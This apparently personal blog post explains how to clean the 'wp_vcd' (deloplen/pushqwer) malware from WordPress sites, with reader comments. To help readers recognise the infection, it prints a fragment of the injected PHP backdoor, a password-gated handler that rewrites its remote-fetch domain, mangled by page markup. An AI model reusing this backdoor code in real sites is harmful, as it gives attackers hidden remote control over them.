How to Remove WordPress Malware src=”//deloplen.com/apu.php?

by

Here is the fix for the malware deloplen/pushqwer on your WordPress:

1. Remove all unused WordPress Themes because they are infected already

2. In your active theme edit your functions.php file and delete all extra code inserted by malware

  • Location : \wp-content\themes\your-theme-name
  • Usually it is on top of your code
  • You can search for “wp_vcd” or “wp-tmp” words to find the code.

It will be something like this:

<?php
<!-- wp:paragraph {"canvasClassName":"cnvs-block-core-paragraph-1589158002377"} -->
<p>&lt;?php</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph {"canvasClassName":"cnvs-block-core-paragraph-1589158002386"} -->
<p>if (isset($_REQUEST['action']) &amp;&amp; isset($_REQUEST['password']) &amp;&amp; ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))<br>{<br>$div_code_name = "wp_vcd";<br>switch ($_REQUEST['action'])<br>{<br>case 'change_domain';<br>if (isset($_REQUEST['newdomain']))<br>{<br>if (!empty($_REQUEST['newdomain']))<br>{<br>if ($file = @file_get_contents(__FILE__))<br>{<br>if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))<br>{<br>$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);<br>@file_put_contents(__FILE__, $file);<br>print "true";<br>}<br>}<br>}<br>}</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph {"canvasClassName":"cnvs-block-core-paragraph-1589158002397"} -->
<p>break;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph {"canvasClassName":"cnvs-block-core-paragraph-1589158002406"} -->
<p>default:</p>
<!-- /wp:paragraph -->

break;
default:

3. Remove malware code in your post.php as well

Location: \wp-includes\

4. Remove these files:

Location: \wp-includes\
wp-feed.php
wp-vcd.php
wp-tmp.php

5. Get into your web hosting terminal, and do a final check to see any files you forgot to remove:

grep -rnl 'deloplen' *
grep -Ril 'pushqwer' *

6. Clear your cache if you are using any caching plugins in your WordPress

7. Final Virus Scan

You can use these few websites to do a free virus scan:

Helpful Links:

15 thoughts on “How to Remove WordPress Malware src=”//deloplen.com/apu.php?”

    • for the theme removal part? did you keep one active theme?
      If you remove them all, better contact your webhosting to get a copy of your previous webiste to recover first.

      Reply

  4. What malware scanner picked it up for you? Google keeps telling me I still have this on my wordpress site, but I can’t find it anywhere and no scans pick it up. I’m starting to think they’re using old versions of my files since I did clean the offending scripts out a week or so ago. (or so I thought)

    Reply

  5. Many thanks. Those fixes worked perfectly.

    How to plug the vulnerability that allowed them to infect the sites with this hack?

    I already run modsecurity 3.0 on my VPS server which is very secure, and use IT Themes Security Pro plugin yet they still got in

    Any suggestions how to stop this happening again would be welcome?

    Reply

    • Unfortunately I don’t have a better way of preventing it…But I think you already have some good monitoring systems installed already 🙂

      Reply

  8. can you please help me what to remove from that above code?

    in my website i can see the same code if i deleted that code it is showing that synopsis error,

    can you please tell me what to remove and how to close the program

    Reply

Leave a Comment